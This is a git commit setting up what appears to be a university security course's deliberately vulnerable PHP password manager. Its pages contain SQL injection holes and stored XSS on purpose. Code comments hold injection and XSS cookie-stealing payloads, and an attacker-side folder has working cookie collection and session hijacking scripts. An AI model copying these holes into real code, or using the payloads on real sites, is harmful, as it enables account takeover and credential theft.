hoo2/InformationSystemsSecurity
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Init commit with passman (and XSS) files aranged as a deployed environment

Browse Source
This commit is contained in:
Christos Choutouridis 2026-01-10 17:56:35 +02:00
commit 61c777f33a
14 changed files with 828 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
.gitignore vendored Normal file
View File

@ -0,0 +1,3 @@
# Generic files
*.zip

65
passman-dev/db/init/01-create-pwd_mgr-db-withData.sql Normal file
View File

@ -0,0 +1,65 @@
-- --------------------------------------------------------
-- Host: 127.0.0.1
-- Server version: 10.4.22-MariaDB - mariadb.org binary distribution
-- Server OS: Win64
-- HeidiSQL Version: 12.7.0.6850
-- --------------------------------------------------------
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET NAMES utf8 */;
/*!50503 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
CREATE DATABASE IF NOT EXISTS `pwd_mgr` /*!40100 DEFAULT CHARACTER SET latin1 */;
USE `pwd_mgr`;
CREATE TABLE IF NOT EXISTS `dummy` (
`id` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
CREATE TABLE IF NOT EXISTS `login_users` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`username` varchar(20) NOT NULL,
`password` varchar(256) NOT NULL DEFAULT '',
PRIMARY KEY (`id`),
UNIQUE KEY `user` (`username`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=latin1;
INSERT INTO `login_users` (`id`, `username`, `password`) VALUES
(1, 'u1', 'p1');
CREATE TABLE IF NOT EXISTS `notes` (
`notesid` int(11) NOT NULL AUTO_INCREMENT,
`login_user_id` int(11) DEFAULT NULL,
`note` varchar(300) NOT NULL,
PRIMARY KEY (`notesid`) USING BTREE,
KEY `FK_notes-login_users` (`login_user_id`) USING BTREE,
CONSTRAINT `FK_notes-login_users` FOREIGN KEY (`login_user_id`) REFERENCES `login_users` (`id`) ON DELETE CASCADE ON UPDATE CASCADE
) ENGINE=InnoDB AUTO_INCREMENT=28 DEFAULT CHARSET=latin1;
INSERT INTO `notes` (`notesid`, `login_user_id`, `note`) VALUES
(1, 1, 'test1');
CREATE TABLE IF NOT EXISTS `websites` (
`webid` int(11) NOT NULL AUTO_INCREMENT,
`login_user_id` int(11) DEFAULT NULL,
`web_url` varchar(250) NOT NULL,
`web_username` varchar(20) NOT NULL DEFAULT '',
`web_password` varchar(300) NOT NULL DEFAULT '',
PRIMARY KEY (`webid`) USING BTREE,
KEY `FK_websites-login_users` (`login_user_id`),
CONSTRAINT `FK_websites-login_users` FOREIGN KEY (`login_user_id`) REFERENCES `login_users` (`id`) ON DELETE CASCADE ON UPDATE CASCADE
) ENGINE=InnoDB AUTO_INCREMENT=16 DEFAULT CHARSET=latin1;
INSERT INTO `websites` (`webid`, `login_user_id`, `web_url`, `web_username`, `web_password`) VALUES
(1, 1, 'www.test.com', 'tom', 'tompass');
/*!40103 SET TIME_ZONE=IFNULL(@OLD_TIME_ZONE, 'system') */;
/*!40101 SET SQL_MODE=IFNULL(@OLD_SQL_MODE, '') */;
/*!40014 SET FOREIGN_KEY_CHECKS=IFNULL(@OLD_FOREIGN_KEY_CHECKS, 1) */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40111 SET SQL_NOTES=IFNULL(@OLD_SQL_NOTES, 1) */;

126
passman-dev/php/passman/dashboard.php Normal file
View File

@ -0,0 +1,126 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Dashboard</title>
<style>
table {
border-collapse: collapse;
width: 30%;
border: 1px solid black;
}
td, tr {
width: 50%;
padding: 8px;
text-align: left;
}
</style>
</head>
<?php
// Resume existing session (or start a new one)
session_start();
// If not logged in redirect to login page
if (!isset($_SESSION['loggedin']) || $_SESSION['loggedin'] !== true || $_SESSION['username'] == '') {
header("Location: login.php");
exit;
}
$username = $_SESSION['username'];
// Connect to the database
$conn=mysqli_connect("localhost","root","","pwd_mgr");
// Check connection
if (mysqli_connect_errno()) {
echo "Failed to connect to MySQL: " . mysqli_connect_error();
exit();
}
// Check if 'Insert-new-website' button is selected
if(isset($_POST['new_website'], $_POST['new_username'], $_POST['new_password']) &&
trim($_POST['new_website']) !='' && trim($_POST['new_username']) != '' && trim($_POST['new_password']) != '') {
$new_website = trim($_POST["new_website"]);
$new_username = trim($_POST["new_username"]);
$new_password = trim($_POST["new_password"]);
// Insert new web site
$sql_query = "INSERT INTO websites (login_user_id,web_url,web_username,web_password) VALUES " .
"((SELECT id FROM login_users WHERE username='{$username}'),'{$new_website}','{$new_username}','{$new_password}');";
//echo $sql_query;
$result = $conn->query($sql_query);
$conn -> close();
// After processing, redirect to the same page to clear the form
unset($_POST['new_website']);
unset($_POST['new_username']);
unset($_POST['new_password']);
header("Location: " . $_SERVER['PHP_SELF']);
exit();
}
// Check if 'Delete-website' button was selected
if(isset($_POST['delete_website']) && trim($_POST["websiteid"] != '')) {
$webid = trim($_POST["websiteid"]);
// Delete selected web site
$sql_query = "DELETE FROM websites WHERE webid='{$webid}';";
//echo $sql_query;
$result = $conn->query($sql_query);
$conn -> close();
// After processing, redirect to the same page to clear the form
unset($_POST['websiteid']);
header("Location: " . $_SERVER['PHP_SELF']);
exit();
}
// Display list of user's web sites
$sql_query = "SELECT * FROM websites INNER JOIN login_users ON websites.login_user_id=login_users.id WHERE login_users.username='{$username}';";
//echo $sql_query;
$result = $conn->query($sql_query);
//echo htmlspecialchars($username);
echo "<h3>Entries of " . $username . "</h3>";
if (!empty($result) && $result->num_rows >= 1) {
while ($row = $result -> fetch_assoc()) {
echo "<table border=0>";
echo "<tr style='background-color: #f4f4f4;'><td colspan=2>" . $row["web_url"] . "</td></tr>" .
"<tr><td>Username: " . $row["web_username"] . "</td><td>Password: " . $row["web_password"] . "</td></tr>";
echo "<tr><td><form method='POST' style='height: 3px'>" .
"<input type='hidden' name='websiteid' value='" . $row["webid"] . "'>" .
"<button type='submit' name='delete_website'>Delete</button></form></td></tr>";
echo "<tr><td colspan=2 style=height: 20px;></td></tr>";
echo "</table><p/>";
}
// Free result set
$result -> free_result();
} else {
echo "<p><font color=red>No entries found.</font></p>";
}
$conn -> close();
?>
<body>
<p/>
<form method="POST" action="dashboard.php">
<input type="text" name="new_website" placeholder="website"><br />
<input type="text" name="new_username" placeholder="Username"><br />
<input type="password" name="new_password" placeholder="Password"><br />
<button type="submit">Insert new website</button>
</form>
<p/>
<a href="notes.php">Notes - announcements</a>
<p/>
<a href="logout.php">Logout</a>
<p/>
<a href="index.html">Home page</a>
</body>
</html>

59
passman-dev/php/passman/index.html Normal file
View File

@ -0,0 +1,59 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Password Manager</title>
</head>
<body>
<h3>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Password Manager - AUTH-ECE - 2025-2026</h3>
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;List of Password Manager pages:
<br />
<ul>
<li>
<a href="http://localhost/passman/register.php">Registration Form</a>
</li>
<br />
<li>
<a href="http://localhost/passman/login.php">Login Page</a>
</li>
<br />
<li>
<a href="http://localhost/passman/logout.php">Logout Page</a>
</li>
<br />
<li>
<a href="http://localhost/passman/dashboard.php">Dashboard</a> (display passwords for websites)
</li>
<br />
<li>
<a href="http://localhost/passman/notes.php">Notes</a> (notes/comments/announcements)
</li>
<br />
</ul>
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Testing useful functions:
<br />
<ul>
<li>
Test <a href="http://localhost/passman/test_hash.php">hashing</a> functions in PHP (server side)
</li>
<br />
<li>
Test <a href="http://localhost/passman/test_encrypt.php">encrypting/decrypting</a> functions in PHP (server side)
</li>
<br />
</ul>
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Hacker's side (for using stealing cookies using XSS):
<a href="http://localhost/passman/xss">http://localhost/passman/xss</a>
<br />
</body>
</html>

89
passman-dev/php/passman/login.php Normal file
View File

@ -0,0 +1,89 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Login Form</title>
</head>
<?php
// Start a new session (or resume an existing one)
session_start();
// Check if the user is already logged in
if (isset($_SESSION['loggedin']) && $_SESSION['loggedin'] === true && $_SESSION['username'] !== '') {
// Redirect to the dashboard page
header("Location: dashboard.php");
exit;
}
if ($_SERVER["REQUEST_METHOD"] === "POST") {
if(!isset($_POST['username'], $_POST['password']) || trim($_POST['username']) =='' || trim($_POST['password']) == '') {
$login_message = "Missing username or password.";
}
else {
// Get user submitted information
$username = trim($_POST['username']);
$password = trim($_POST['password']);
// Connect to the database
$conn=mysqli_connect("localhost","root","","pwd_mgr");
// Check connection
if (mysqli_connect_errno()) {
echo "Failed to connect to MySQL: " . mysqli_connect_error();
exit();
}
// xxx' OR 1=1; -- '
$sql_query = "SELECT * FROM login_users WHERE username='{$username}' AND password='{$password}';";
//echo $sql_query;
// Check if the credentials are valid
$result = $conn->query($sql_query);
unset($_POST['username']);
unset($_POST['password']);
if (!empty($result) && $result->num_rows >= 1) {
// Regenerate session ID to prevent session fixation!
//session_regenerate_id(true);
// Successfully logged in
$_SESSION['username'] = $username;
$_SESSION['loggedin'] = true;
//while ($row = $result -> fetch_assoc()) {
// print_r($row);
// $_SESSION['user_id'] = $row['id'];
//}
// Free result set
$result -> free_result();
$conn -> close();
// Redirect to a dashboard page
header("Location: dashboard.php");
exit;
} else {
$login_message = "Invalid username or password";
}
$conn -> close();
}
}
?>
<body>
<h3>Password Manager</h3>
<form method="POST" action="">
<input type="text" name="username" placeholder="Username" required><br />
<input type="password" name="password" placeholder="Password"><br />
<button type="submit">Login</button>
</form>
<br />
<?php if (!empty($login_message)) { echo "<font color=red>$login_message</font>"; } ?>
<p/>
<a href="register.php">Register new user</a>
<p/>
<a href="index.html">Home page</a>
</body>
</html>

24
passman-dev/php/passman/logout.php Normal file
View File

@ -0,0 +1,24 @@
<?php
// Resume existing session (or start a new one)
session_start();
// Destroy the session in case of using session-based authentication
session_unset(); // Unset all session variables
session_destroy(); // Destroy the session
//redirect to the login page
echo '<script>window.location.href = "login.php";</script>';
exit();
/*
if (session_status() !== PHP_SESSION_ACTIVE) :void
{
session_start();
session_unset();
session_destroy();
session_write_close();
setcookie(session_name(), '', 0, '/');
session_regenerate_id(true);
}
*/
?>

173
passman-dev/php/passman/notes.php Normal file
View File

@ -0,0 +1,173 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Notes - Comments</title>
<style>
form {
max-width: 500px;
margin: 20px 0;
padding: 20px;
border: 1px solid #ccc;
background-color: #f9f9f9;
text-align: left;
}
label {
font-size: 1.1em;
margin-bottom: 10px;
display: inline-block;
}
textarea {
width: 100%;
height: 150px;
padding: 10px;
font-size: 1em;
border: 1px solid #ccc;
resize: vertical;
text-align: left;
}
button {
padding: 10px 20px;
font-size: 1em;
background-color: #4CAF50;
color: white;
border: none;
cursor: pointer;
}
button:hover {
background-color: #45a049;
}
body {
font-family: Arial, sans-serif;
background-color: #f4f4f9;
margin: 0;
padding: 20px;
}
.note {
width: 510px;
background-color: #f9f9f9;
border: 1px solid #ddd;
padding: 15px;
margin-bottom: 15px;
border-radius: 5px;
box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
}
.note-content {
font-size: 1.2em;
color: #333;
}
.note-signature {
text-align: right;
font-size: 0.9em;
color: #666;
margin-top: 10px;
font-style: italic;
}
</style>
</head>
<?php
// Resume existing session (or start a new one)
session_start();
// If not logged in redirect to login page
if (!isset($_SESSION['loggedin']) || $_SESSION['loggedin'] !== true || $_SESSION['username'] == '') {
header("Location: login.php");
exit;
}
$username = $_SESSION['username'];
// Connect to the database
$conn=mysqli_connect("localhost","root","","pwd_mgr");
// Check connection
if (mysqli_connect_errno()) {
echo "Failed to connect to MySQL: " . mysqli_connect_error();
exit();
}
// Check if new note is entered and add it
if(isset($_POST['new_note']) && trim($_POST['new_note']) !='') {
$new_note = trim($_POST["new_note"]);
/*
XSS using alert(2)<script>alert(2);</script>
XSS using string.fromCharCode with ASCII codes<script>alert(String.fromCharCode(88,83,83,32,117,115,105,110,103,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101));</script>
XSS eval of Hex Unicode Escape Sequences<script>eval("\u0061\u006c\u0065\u0072\u0074(\u0022\u0058\u0053\u0053\u0020\u0075\u0073\u0069\u006e\u0067\u0020\u0065\u0076\u0061\u006c\u0022)");</script>
XSS console cookie<script>console.log(document.cookie);alert(document.cookie);</script>
XSS steal cookie with fetch
<script>
fetch(`http://localhost/passman/xss/getcookie.php?v=`+document.cookie)
.then(response => response.text())
.then(data => {
console.log(data);
})
.catch(error => {
console.error(`Error fetching data:`, error);
});
</script>
XSS steal cookie with simpler fetch<script>fetch(`http://localhost/passman/xss/getcookie.php?v=`+document.cookie)</script>
or<script>fetch(`http://localhost/passman/xss/getcookie.php?v=${document.cookie}`)</script>
// HAS PROBLEM: XSS steal cookie with href redirection<script>window.location.href=`http://localhost/passman/xss/getcookie.php?v=`+document.cookie;</script>
// HAS PROBLEM: XSS steal cookie with img on-error<img src=x onerror=this.src=`http://localhost/passman/xss/getcookie.php?v=`+document.cookie;>
*/
// Insert new note
//$sql_query = "INSERT INTO notes (login_user_id,note) VALUES " .
// "((SELECT id FROM login_users WHERE username='{$username}'),('{$new_note}'));";
$sql_query = "INSERT INTO notes (login_user_id, note) ".
"VALUES ((SELECT id FROM login_users WHERE username='{$username}'), '{$new_note}')";
//echo $sql_query;
$result = $conn->query($sql_query);
$conn -> close();
// After processing, redirect to the same page to clear the form
unset($_POST['new_note']);
header("Location: " . $_SERVER['PHP_SELF']);
exit();
}
// Display list of all notes/comments
$sql_query = "SELECT notes.note, login_users.username FROM notes INNER JOIN login_users ON notes.login_user_id=login_users.id;";
//echo $sql_query;
$result = $conn->query($sql_query);
echo "<h3>List of notes/comments</h3>";
if (!empty($result) && $result->num_rows >= 1) {
while ($row = $result -> fetch_assoc()) {
echo "<div class='note'>";
echo "<div class='note-content'>" . $row["note"] . "</div>";
echo "<div class='note-signature'> by " . $row["username"] . "</div>";
echo "</div>";
}
// Free result set
$result -> free_result();
} else {
echo "<p><font color=red>No entries found.</font></p>";
}
$conn -> close();
?>
<body>
<p/>
<form method="POST">
<label for="note">Enter your note:</label><br>
<textarea id="note" name="new_note" placeholder="Write your note here..." required></textarea><br><br>
<button type="submit">Submit Note</button>
</form>
<a href="dashboard.php">Dashboard</a>
<p/>
<a href="logout.php">Logout</a>
</body>
</html>

83
passman-dev/php/passman/register.php Normal file
View File

@ -0,0 +1,83 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Registration Form</title>
</head>
<body>
<h3>New user registration</h3>
<?php
// Start a new session (or resume an existing one)
session_start();
// Check if the user is already logged in
if (isset($_SESSION['loggedin']) && $_SESSION['loggedin'] === true && $_SESSION['username'] !== '') {
echo "<font color=red>You are already logged in!</font></br>";
echo "Please <a href='logout.php'>logout</a> first";
exit;
}
if ($_SERVER["REQUEST_METHOD"] === "POST") {
if(!isset($_POST['new_username'], $_POST['new_password']) || trim($_POST['new_username']) =='' || trim($_POST['new_password']) == '') {
$login_message = "Missing username or password.";
}
else {
// Get user submitted information
$new_username = trim($_POST['new_username']);
$new_password = trim($_POST['new_password']);
mysqli_report(MYSQLI_REPORT_OFF); // disable exceptions
// Connect to the database
$conn=mysqli_connect("localhost","root","","pwd_mgr");
// Check connection
if (mysqli_connect_errno()) {
echo "Failed to connect to MySQL: " . mysqli_connect_error();
exit();
}
// Insert a new user
$sql_query = "INSERT INTO login_users (username,password) VALUES ('{$new_username}','{$new_password}');";
//echo $sql_query;
$result = $conn->query($sql_query);
unset($_POST['new_username']);
unset($_POST['new_password']);
if ($result == true) {
echo "<font color=red>Successful registration!</font>";
echo "<p />You can now use the <a href='login.php'>login</a> page";
exit;
}
else
$login_message = "Error, probably user already exists!";
// Free result set
$conn -> close();
}
}
?>
<body>
<p/>
<form method="POST" action="register.php">
<input type="text" name="new_username" placeholder="Username"><br />
<input type="password" name="new_password" placeholder="Password"><br />
<button type="submit">Register</button>
</form>
<br />
<?php
if (!empty($login_message)) {
echo "<font color=red>$login_message</font>";
echo "<p />Go to the <a href='login.php'>login</a> page";
}
?>
</body>
</html>

47
passman-dev/php/xss/getcookie.php Normal file
View File

@ -0,0 +1,47 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Get a cookie</title>
</head>
<body>
<h3>Get a cookie</h3>
<?php
// Check if 'value' parameter is passed via GET
// http://localhost/passman/xss/getcookie.php?v=PHPSESSID=o1mg400lipd2mck69kpfnl6p5s
if (isset($_GET['v'])) {
$stolen_cookie = $_GET['v']; // Retrieve the value from the GET parameter
// Define the file path where the value will be stored
$file = 'stolencookies.txt';
// Append the value to the file (or create it if it doesn't exist)
file_put_contents($file, $stolen_cookie . PHP_EOL, FILE_APPEND);
echo "Value has been saved successfully!";
} else {
echo "No value received via GET query string.";
}
// Set cookie manually for debugging:
//$stolen_cookie = "PHPSESSID=o1mg400lipd2mck69kpfnl6p5s";
?>
<!--
<script>
let expires = new Date();
//expires.setTime(expires.getTime()); // cookie expires now
//expires.setTime(expires.getTime() + (30 * 24 * 60 * 60 * 1000)); // 30 days from now
expires.setTime(expires.getTime() + (120 * 1000)); // 2 mins from now
document.cookie = <?php echo '"' . $stolen_cookie . '"' ?> + "; path=/; expires=" + expires.toUTCString() + "; Secure; SameSite=Strict";
// Check if cookies are set using console.log
console.log(document.cookie);
</script>
-->
</body>
</html>

36
passman-dev/php/xss/index.html Normal file
View File

@ -0,0 +1,36 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>XSS for Password Manager</title>
</head>
<body>
<h3>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;XSS for Password Manager</h3>
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;List of pages:
<br />
<ul>
<li>
Get a cookie: <a href="http://localhost/passman/xss/getcookie.php">getcookie.php</a>
<br /><i>used by XSS javascripts as: http://localhost/passman/xss/getcookie.php?v=PHPSESSID=o1mg400lipd2mck69kpfnl6p5s</i>
</li>
<br />
<li>
File of stolen cookies: <a href="stolencookies.txt">stolencookies.txt</a>
</li>
<br />
<li>
List all cookies: <a href="http://localhost/passman/xss/listcookies.php">listcookies.php</a>
</li>
<br />
<li>
Use of a cookie: <a href="http://localhost/passman/xss/usecookie.php">usecookie.php</a>
<br /><i>used by listcookies.php as http://localhost/passman/xss/usecookie.php?v=3h9ug308730bfugjjse0dbmcjr</i>
</li>
</ul>
</body>
</html>

62
passman-dev/php/xss/listcookies.php Normal file
View File

@ -0,0 +1,62 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>List stolen cookies</title>
</head>
<body>
<h3>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;List of 'stolen' cookies</h3>
<?php
// Define the path to the cookie file
$cookie_file = 'stolencookies.txt'; // Change this to the path of your cookie file
// Check if the file exists
if (file_exists($cookie_file)) {
// Read the contents of the cookie file
$cookie_data = file($cookie_file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
/*
$expires = new DateTime('now', new DateTimeZone('UTC')); // Current UTC date and time
$expires->modify('+2 minutes'); // Add 2 minutes
$expiration = $expires->format('D, d M Y H:i:s') . ' GMT';
*/
// Process each line
echo "<ol>";
$cookie_name = "PHPSESSID=";
foreach ($cookie_data as $line) {
// Split the cookies in each line by semicolon
$cookies = explode(';', $line);
// List each cookie separately
foreach ($cookies as $cookie) {
$cookie = trim($cookie);
// Check for PHPSESSID=... cookie
if (strpos($cookie, $cookie_name) === 0) {
// Get PHPSESSID cookie value
$cookie = str_replace("PHPSESSID=", "", trim($cookie));
echo "<li>";
echo "<a href='http://localhost/passman/xss/usecookie.php?v=" . $cookie . "'>";
echo "PHPSESSID=" . htmlspecialchars($cookie) . "</a>";
echo "</li>";
} else {
// Cookie does not contain PHPSESSID value
echo "<li>";
echo " Skipping cookie: " . htmlspecialchars($cookie);
echo "</li>";
}
}
}
echo "</ol>";
} else {
// Error message if file does not exist
echo "<p>Cookie file not found.</p>";
}
?>
</body>
</html>

2
passman-dev/php/xss/stolencookies.txt Normal file
View File

@ -0,0 +1,2 @@
PHPSESSID=knjfug3u4gavdas9o4eupe38l1; seclab_user=u1
seclab_user=u1; PHPSESSID=o1mg400lipd2mck69kpfnl6p5s

59
passman-dev/php/xss/usecookie.php Normal file
View File

@ -0,0 +1,59 @@
<?php
// Check if 'value' parameter is passed via GET
// http://localhost/passman/xss/setcookie.php?v=PHPSESSID
if (isset($_GET['v'])) {
$stolen_cookie = $_GET['v']; // Retrieve the value from the GET parameter
// Set the session cookie manually
//setcookie("PHPSESSID", $stolen_cookie, time() + 3600, "/");
setcookie("PHPSESSID", $stolen_cookie, 0, "/");
// Set the session ID
session_id($stolen_cookie);
// Now resume the session
session_start();
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Test of using a stolen cookie</title>
</head>
<body>
<h3>Test of using a stolen cookie</h3>
Bypassing authentication and impersonating another user by using a stolen cookie<br/>
<?php
// Now use the session
echo "Session ID is set to: <b>PHPSESSID=" . session_id() . "</b><br>";
/*
if (isset($_SESSION['loggedin']) && $_SESSION['username'] !== '') {
echo "Username: " . $_SESSION['username'] . "<br>";
echo "Logged in: " . $_SESSION['loggedin'] . "<br>";
}
else {
echo "session variables expired";
}
*/
// If session parameter is not set, set it to: 'undefined ...'
$username = $_SESSION['username'] ?? 'undefined (session variable expired)';
$loggedin = $_SESSION['loggedin'] ?? 'undefined (session variable expired)';
echo "<b>Username:</b> " . $username . "<br>";
echo "<b>Logged in flag:</b> " . $loggedin . "<br>";
?>
<br />
If all above session parameters are defined, try accessing the
<a href="../dashboard.php">dashboard</a>
<br /><br />
<a href="listcookies.php">List cookies</a>
</body>
</html>

BIN
Εργασία-Ασφάλειας 2025-2026.pdf Normal file
View File

Binary file not shown.